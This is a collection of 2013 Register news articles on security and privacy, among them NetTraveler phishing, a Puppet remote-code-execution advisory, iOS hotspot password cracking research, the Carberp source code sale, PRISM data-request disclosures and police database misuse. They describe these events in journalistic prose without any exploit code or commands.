STE WILLIAMS

Regcast training : Hyper-V 3.0, VM high availability and disaster recovery

The Chinese group behind the recently discovered NetTraveler attacks is now using widespread interest in the infamous National Security Agency (NSA) PRISM surveillance program to encourage users to open malicious email attachments, it has emerged.

Brandon Dixon of the 9bplus blog said he came across an email uploaded to VirusTotal entitled “CIA’s Prism Watchlist”.

The intended recipient of the message was a Yahoo account associated with the Regional Tibet Youth Congress in Mundgod, India, he added. The sender address was apparently faked to approximate “Jill Kelley” – the woman whose complaints of harassment prompted the investigation which led to the resignation of former CIA boss David Petraeus.

The Word doc attached was named “Monitored List 1.doc”, containing malware designed to exploit the same vulnerability (CVE-2012-0158) favoured by the NetTraveler gang, Dixon wrote.

“It’s funny to note that these actors are keeping up with their same techniques and infrastructure (not all of it) despite being 100 per cent outed,” he added. “Again, this sort of behaviour shows poor operational security or a complete lack of care.”

The NetTraveler attacks were first brought to light by Kaspersky Lab earlier this month, when researchers at the AV vendor revealed that the campaign had successfully compromised more than 350 high profile victims in 40 countries, with the malware in question having been active since 2004.

Key targets included embassies, oil and gas corporations, research institutes, military contractors and governments.

Tibetan and Uyghur activists were also among those targeted by the group of 50-odd individuals – usually a tell-tale sign of Chinese involvement.

Kaspersky added that most members were native Chinese speakers. ®

Agentless Backup is Not a Myth

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/19/prism_nettraveler_email_malware/

Ensure Ease of Recovery with Asigra’s Agentless Software

India’s outsourcing giants are likely to face more delays in their frustrated bid to tap a potential IT services market worth $30 billion, after a report emerged suggesting the EU still has big data security concerns with the country.

The EU and India have been trying to finalise their Broad-based Trade and Investment Agreement since 2006, with the goal of breaking down trade barriers, but progress in the past few months has been slow, according to The Hindu.

One of New Delhi’s major requests as part of the deal is for the country to be recognised as a “data secure destination”, an accreditation which could increase the country’s outsourcing revenue from the EU from $20bn to $50bn, according to Nasscom’s Data Security Council of India.

Although the EU Justice Department’s study into India’s data protection regime has not yet been completed, mutterings suggest it has identified significant gaps in local laws which could require time-consuming legislative amendments.

“The recent communication from the EU Justice Department is worrying for us as it indicates that the EU is not willing to offer us data secure status till we make changes in our systems. This could take a long time as it may also require legislative changes,” a Commerce Department official told The Hindu.

“It is very clear that the EU is not in any hurry to give us data secure status. This would hamper the trade talks further.”

The thorough audit demanded by the EU would seem appropriate given the data breaches at Indian IT services firms periodically come to light.

For example, news broke a year ago that corrupt staff in local call centres were systematically selling on the personal details of millions of British customers.

It’s a problem which was highlighted in February by prime minister David Cameron, who during a trade visit to India signed a deal promising “an unprecedented level of co-operation with India on security issues”.

The joint task force which will be set up between the two countries will see the UK share its expertise in tackling data security with India in order to better secure the increasing amount of data stored on servers in the sub-continent. ®

Agentless Backup is Not a Myth

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/19/india_outsourcing_data_security_woes_eu/

Regcast training : Hyper-V 3.0, VM high availability and disaster recovery

Puppet Labs has blasted out a security advisory about a vulnerability in the popular infrastructure management tool Puppet.

The CVE-2013-3567 (Unauthenticated Remote Code Execution Vulnerability) warning was issued by Puppet Labs on Tuesday, and advises all Puppet users to upgrade to versions 2.7.22, 3.2.2 or later, and paid-for customers of Puppet Enterprise to move to 2.8.2.

The vulnerability is serious as it allows for code to be executed remotely.

“When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload,” the company wrote.

Puppet is an open source configuration management and automation tool, and its development is stewarded by Puppet Labs, which makes the commercial version, Puppet Enterprise. VMware was the sole investor in the company’s $30 million fourth funding round in January.

One alternative to Puppet is Chef, which is made by Opscode. Chef has been backed heavily by Amazon Web Services and sits inside the company’s OpsWorks control layer. ®

Agentless Backup is Not a Myth

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/puppet_security_vuln/

Customer Success Testimonial: Recovery is Everything

iPhones being used as Wi-Fi hotspots are open to attack because of lax security protocols in the automatic password generation system Apple has in place, according to new research from the University of Erlangen in Germany.

The paper, “Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots” by Andreas Kurtz, Felix Freiling, and Daniel Metz, found that the seemingly random password iOS generates for hotspots is simple to crack. It consists of four to six characters followed by a four-digit number string.

As a test, the team downloaded a 52,500-word dictionary from an open source version of Scrabble, added number-generating code, and cracked the iOS password system every time – although the team points out it isn’t suggesting Apple used the same dictionary. Using a AMD Radeon HD 6990 GPU, the average time to crack was 59 minutes – which is interesting, but hardly practical.

So the team then reverse-engineered the iOS word list used for password generation, using “static and dynamic analysis,” tools like GNU Debugger, and by manually going through the ARM disassembly of the relevant iOS frameworks. They found Apple uses English-language words of between four and six letters from a dictionary copyrighted by Lernout Hauspie Speech Products.

“Only 1,842 different entries of that dictionary are taken into consideration,” the paper states. “Consequently, any default password used within an arbitrary iOS mobile hotspot, is based on one of these 1,842 different words. This fact reduced the search space of our initial brute force attack by more than 96% and thus increased the overall cracking speed significantly.”

In addition, the selection of words picked for passwords was skewed. “Suave” was used 0.08 per cent of the time, “subbed” cropped up 0.76 per cent and “head” 0.53 per cent – ten times the frequency they should have had under a random pick. By frontloading these selections into any attack code, the chances of cracking the system quickly are greatly increased.

The team also decided to upgrade their hardware to bring down search times and built a box with four AMD Radeon HD 7970 units that could burn through 390,000 guesses per second. This cut the time to crack automatically generated passwords down to 24 seconds, or 52 using a single AMD Radeon HD 6990 GPU. Users should specify their own the team recommends.

As a test case, the team built an iOS application dubbed “Hotspot Cracker” which could be used to try out an attack of the target phone. This was limited by the processing power of the smartphone, but can be used in conjunction with a cloud password cracking service such as CloudCracker for better results.

Once the password has been cracked, the operator can piggyback on the hotspot’s bandwidth, stage a man-in-the-middle attack for eavesdropping, and get access to files stored on the device. Jailbroken iPhones are extra risky since they could allow access to the basic iPhone system services code.

While the researchers concentrated on Apple, they note that other mobile operating systems shouldn’t get too smug. Microsoft’s Windows Phone 8 uses a similar password system that doesn’t even use words, relying instead on eight-digit number strings alone. Android is much better, but there have been cases of manufacturers such as HTC dumbing down password generation for some handsets, the authors report.

“The results of our analysis have shown that the mobile hotspot feature of smart devices increases the attack surface in several ways,” the team concludes. “As the default password of an arbitrary iOS hotspot user can be revealed within seconds, attacks on mobile hotspots might have been underestimated in the past and might be an attractive target in the future.” ®

Ensure Ease of Recovery with Asigra’s Agentless Software

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/iospoor_passwords_crackable_24_seconds/

Customer Success Testimonial: Recovery is Everything

Users of the Tor traffic anonymizing service are currently locked out of Facebook after a flood of dodgy traffic triggered an automatic lockdown by the social network’s security systems.

Given the paranoid post-PRISM times we live, in the outage on Tuesday caused a certain amount of online panic. A report highlighting the issue briefly topped the front page on Reddit, before both Facebook and Tor told users there was nothing to worry about.

“Facebook is not blocking Tor deliberately,” a Facebook spokesman told El Reg in a statement. “However, a high volume of malicious activity across Tor exit nodes triggered Facebook’s site integrity systems which are designed to protect people who use the service. Tor and Facebook are working together to find a resolution.”

Tor too was quick to reassure users that this wasn’t the beginning of a crackdown on access to Facebook, although there’s no public word yet as to the specific type of traffic that triggered the shutdown. In a blog post, it assured users of Tor systems that it was working with Facebook on this, and that they would be able to get their daily dose of birthday reminders, cat pictures, and web games as soon as the problem was fixed.

There’s been a upsurge of interest in the Tor system ever since the revelations by NSA whistleblower Ed Snowden about the extent of domestic and international data surveillance by the US intelligence services. Tor uses a network of proxies to protect some of the activities of their users, but the organization has warned that the system isn’t perfect.

“The core Tor software’s job is to conceal your identity from your recipient, and to conceal your recipient and your content from observers on your end,” it said. “By itself, Tor does not protect the actual communications content once it leaves the Tor network. This can make it useful against some forms of metadata analysis, but this also means Tor is best used in combination with other tools.”

The group recommends using the HTTPS Everywhere browser plug-in to encrypt traffic to websites when possible, to do the same with email traffic using TorBirdy and Enigmail, and consider shifting to a decentralized social network such as Diaspora.

That said, a lot of work needs to be done to toughen-up the privacy protection of the Tor system, and the group is running a donations page to fund development and are on the lookout for volunteer coders to help out. ®

Ensure Ease of Recovery with Asigra’s Agentless Software

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/facebook_blocks_tor_traffic_over_security/

Customer Success Testimonial: Recovery is Everything

Yahoo! has become the latest big-hitting American tech firm to reveal exactly how much information it has handed to US spooks.

Marissa Mayer’s outfit joined Apple, Facebook and Microsoft in releasing the number of sensitive data requests made by spies and law enforcement agencies.

The tech giants want to reassure customers and prospective clients that they are not being spied upon in the wake of the PRISM surveillance scandal.

In a joint statement, Marissa Mayer, CEO and Ron Bell, general counsel, said her firm had processed between 12,000 and 13,000 information requests.

The most common requests involved “fraud, homicides, kidnappings and other criminal investigations”, as well as requests made under the Foreign Intelligence Surveillance Act (FISA). Yahoo was keen to point out that it could not reveal how many FISA requests it received.

Apple said it had received between 4,000 and 5,000 data requests in the same period. Microsoft and Facebook released information covering the latter half of 2012, where the social network said it had processed between 9,000 and 10,000 requests. Microsoft said it had dealt with between 6,000 and 7,000.

“We’ve worked hard over the years to earn our users’ trust and we fight hard to preserve it,” Yahoo!’s statement said.

“Like all companies, Yahoo! cannot lawfully break out FISA request numbers at this time because those numbers are classified. However, we strongly urge the federal government to reconsider its stance on this issue.

“Democracy demands accountability. Recognizing the important role that Yahoo! can play in ensuring accountability, we will issue later this summer our first global law enforcement transparency report, which will cover the first half of the year. We will refresh this report with current statistics twice a year.

“As always, we will continually evaluate whether further actions can be taken to protect the privacy of our users and our ability to defend it. We appreciate—and do not take for granted—the trust you place in us.”

In an interview with non-profit telly broadcaster PBS, President Barack Obama insisted that the NSA spying scheme was legal – and, in a piece of textbook doublespeak, even insisted the programme was “transparent”, despite the fact operations are planned and authorised under a cloak of secrecy.

He said this desire for openness had inspired the creation of a secret court set up under the Foreign Intelligence Surveillance Act, which authorises a programme to harvest American phone records and monitor US servers if it is suspected they are being used by foreign terror suspects.

In a bid to reassure a nervous public, Obama claimed to be setting up a board to monitor privacy and civil liberties, which will also decide how much data spies are allowed to harvest. He also promised to keep the public informed about government surveillance programmes in the future.

“We’re going to have to find ways where the public has an assurance that there are checks and balances in place … that their phone calls aren’t being listened into; their text messages aren’t being monitored; their emails are not being read by some big brother somewhere,” Obama said.

“What I’ve asked the intelligence community to do is see how much of this we can declassify without further compromising the program… And they are in that process of doing so now,” he added.

Edward Snowden, the IT worker behind the PRISM leak, is still at large in Hong Kong and gave a live webchat interview to The Guardian yesterday. He said: “All I can say right now is the US government is not going to be able to cover this up by jailing or murdering me. Truth is coming, and it cannot be stopped.”

Nine tech firms are alleged to be involved in the PRISM programme, although it is not clear if some or all of them would have been unwitting participants. So far, all of the firms have said that they require the police and other government workers to present them with a court order on a case-by-case basis before they will allow access to any data and none have copped to providing unfettered access to the Feds. Apple, for instance, said: “We first heard of the government’s ‘Prism’ program when news organizations asked us about it on June 6.” ®

Ensure Ease of Recovery with Asigra’s Agentless Software

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/yahoo_joins_rival_spookgate_data_request_admission/

Customer Success Testimonial: Recovery is Everything

Cybercrooks are selling the source code for the Carberp banking Trojan toolkit through underground forums – at just $5,000 a pop.

The sale of the building blocks for the banking Trojan toolkit is a sign of “conflict within the team”, according to Andrey Komarov of Russian security firm Group-IB.

“Some of the members would love to destroy the project and move onto another business or new product,” Komarov told El Reg.

The toolkit for sale consists of the full source code of Carberp, including: comments; web-injects; all the Carberp modules; source code of Gazavar (the worm module); the admin panel for the command and control servers; Windows exploits related to vulnerabilities patched last year (specifically CVE-2012-1864 and CVE-2012-0217); a bootkit module, and many other components. The complete archive weighs in at 5GB.

Forum user “madeinrm” states that he is offering the source code for sale because someone else using the nickname “batman” had already passed on the source code to a third party, apparently against madeinrm’s approval.

Madeinrm said he intends to screen potential customers but is nonetheless looking to sell the hitherto secret code powering the malware to a large number of people, rather than selling it at a higher price through an exclusive deal.

Screenshot of Carberp. Click to enlarge

Carberp first emerged on the banking fraud scene around three years ago as a competitor to the dominant financial malware platforms Zeus and SpyEye. Russian police have made a number of arrests involving cybercriminals who used the malware to carry out electronic banking fraud.

Despite this, the core of the group actually developing the malware has remained intact and are continuing with their work, even sub-contracting out aspects of the creation of the code.

“Previously, Group-IB took part in the arrest of some members of Carberp group, which is an international group,” Komarov explained. “For example, this team hired Chinese hackers for bootkit module developing, before starting the Carberp 2 project.”

Group-IB reckons that there are currently around 12 active members within the Carberp gang, with most of them either from the Ukraine or Russia. Some members are thought to live in the European Union.

Komarov compared the circumstances surrounding the release of the Carberp source code with those around the release of the source code for ZeuS two years ago.

“This is very similar to how Zeus was leaked,” he said. “Someone tried to sell its source code too, but then the code was published on one of the filesharing networks hosting for free.”

History appears to be repeating itself. Misunderstandings and conflict within the Zeus team are repeating themselves within the Carberp group. The most likely outcome of the rift with the Carberp group is a split, with elements going off to work on other malware-based projects, which might include even more powerful banking Trojan malware.

“We will probably receive something new instead of Carberp in the very near future,” Komarov concluded. ®

Ensure Ease of Recovery with Asigra’s Agentless Software

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/carberp_trojan_source_code_sale/

Customer Success Testimonial: Recovery is Everything

Australians fell prey to online scams to the tune of around $AUD93.5 million in 2012, and reported nearly 84,000 “scam-related contacts” to the Australian Competition and Consumer Commission (ACCC).

The Commission has just released the results of its 2012 report on scam activity, published as part of Australia’s National Consumer Fraud Week 2013.

There’s good news in the report, since 88 percent of the people reporting scams to the ACCC also reported that they suffered no financial loss (that is, they didn’t fall for the scam), and most of those reporting loss were taken down for less than $500. The latter, the watchdog says, indicates that scammers prefer to buy their suckers in big-box outlets rather than one-by-one.

Out of the 83,803 total reports, just 13 percent – a little under 11,000 – related to computer hacking incidents. The vast majority of scammers worked variations on advanced fee fraud as pioneered by Nigerian “419” scams, except that today’s scammer prefers phone calls over e-mail to lay the bait.

Rising through the charts with a bullet is the online shopping scam, up by 65 percent but still only worth $4 million in total.

The Register finds it interesting to extrapolate this data outwards. Australia’s $4 annually per capita loss would, multiplied by the world’s population of 7 billion, suggest that annual online scams are worth around $28 billion – which is somewhat less than the hundreds of billions some surveys suggest.

Australians do, however, appear to be more gullible than Americans. According to the Internet Crime Centre, that country’s losses amounted to $525 billion in 2012 – a mere $US1.66 per person. ®

Ensure Ease of Recovery with Asigra’s Agentless Software

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/internet_fraud_still_stings_suckers/

Customer Success Testimonial: Recovery is Everything

Cross-site scripting, failure to check credentials, directory traversal and SQL injection make up more than three-quarters of vulnerabilities in SAP environments, according to a presentation by ERPScan’s Alexander Polyakov to RSAConference Asia Pacific 2013.

And the vulnerable state of the SAP world is increasingly attracting the attention of security researchers, Polyakov said, with nearly 60 percent of vulnerabilities found in 2013 turned up by outsiders.

That’s troubling, he told delegates, because ERPScan is also observing a growing willingness by SAP users to open up interfaces to the Internet, either for remote workers, inter-office connections, or remote management.

As reported by SC Magazine Australia, which attended the conference, Polyakov said “If someone gets access to the SAP they can steal HR data, financial data or corporate secrets … or get access to a SCADA system.”

A successful intrusion into the SAP system could easily mean the “end of the business”, Polyakov claimed.

With a combination of Shodan and Google searchers, he told the conference he was able to identify more than 4,000 Internet-facing SAP environments.

And – whether it’s because owners are lazy or updates are difficult – Polyakov said 35 percent of the systems ERPScan found were using NetWeaver 7 EHP 0, which hasn’t been updated since 2005. Another 19 percent were running software that hasn’t been patched since 2009, and 23 percent ran a version last updated in 2010.

The presentation slides can be found here. ®

Ensure Ease of Recovery with Asigra’s Agentless Software

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/sap_users_slack_slow_and_backward_on_security/

Regcast training : Hyper-V 3.0, VM high availability and disaster recovery

The number of Metropolitan Police officers investigated for misusing a controversial police database has more than doubled in the past five years, The Register can reveal.

Since 2009, a total of 76 officers in London have been investigated for misusing the Police National Computer (PNC), according to figures released under Freedom of Information laws. The PNC keeps records of all a person’s interactions with the police, whether they were found guilty in court or not. It is estimated that more than 9.2 million people have records on the cops’ computer system.

With this amount of data on hand, data security is of paramount importance. Yet the problem of PNC abuse is growing.

In 2009, 12 Met officers in London were probed for unlawfully accessing the PNC, whereas last year 25 officers were put under investigation.

The Met is currently investigating five officers accused of misusing the PNC. Two officers last year “resigned/ retired” following the investigation, according to the figures, and in 2011 two officers were dismissed without notice.

Anyone who has access to the PNC has a treasure trove of information about British people – and not just criminals. It holds vehicle information and details of stolen property, and is linked to the national DNA and biometric databases. Altering any of this information has the potential to be life-changing.

Even very minor misdemeanours are kept on record for life, potentially causing problems for individuals concerned. For instance if someone has been arrested just once – regardless of whether this was wrongful or for a ridiculously trivial crime – that person is banned from the US Visa Waiver scheme, which allows British nationals to get into the States without a visa.

A Metropolitan Police spokeswoman insisted all its staff were trained to obey data protection laws.

She said:

“The MPS expects its staff to behave professionally, ethically and with the utmost of integrity at all times. Any instance where the conduct of our staff brings the MPS into disrepute is treated extremely seriously in line with MPS policy.”

According to reports in national newspapers, some 20,000 people have been wrongly branded a criminal due to mistakes in the information held on the PNC.

The Information Commisioner ordered police forces to delete criminal records from people who have kept their nose clean for decades, but the cops appealed and won the right to keep millions of minor records until a person reaches the ripe old age of 100, when they are finally set free from the database.

The police are very sensitive about sensibly reducing the amount of data held on the PNC, because the Soham killer Ian Huntley managed to get a job at a school, despite having a record on the PNC that linked him with sex crimes and burglaries. The police and social services were slammed for allowing this to happen, making them extra-cautious in the years since.

The police also brought in a new system called the Police National Database, which was introduced in 2011 and allows officers to share information on an estimated 15 million people – about a quarter of the British population.

Anyone who has been naughty in the past can apply to have their record erased, but they must persuade a top cop that their situation is “exceptional” – which basically means that appeals will be refused in most cases.

Nick Pickles, director of Big Brother Watch, commented:

“The police national computer is one of the least transparent databases operated by the state, with much of its contents never proven in court. It offers a detailed insight to people’s lives, so it is hardly surprising that it is prone to abuse.

“The broader issue is that without any real audit process, these figures are likely to be the tip of the iceberg.”

Are you concerned about the PNC? Did you work on building the system or are you involved with building similar systems? The Reg wants to hear from you. ®

Cloud storage: Lower cost and increase uptime

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/06/18/dozens_of_london_cops_investigated_for_misusing_controversial_police_database/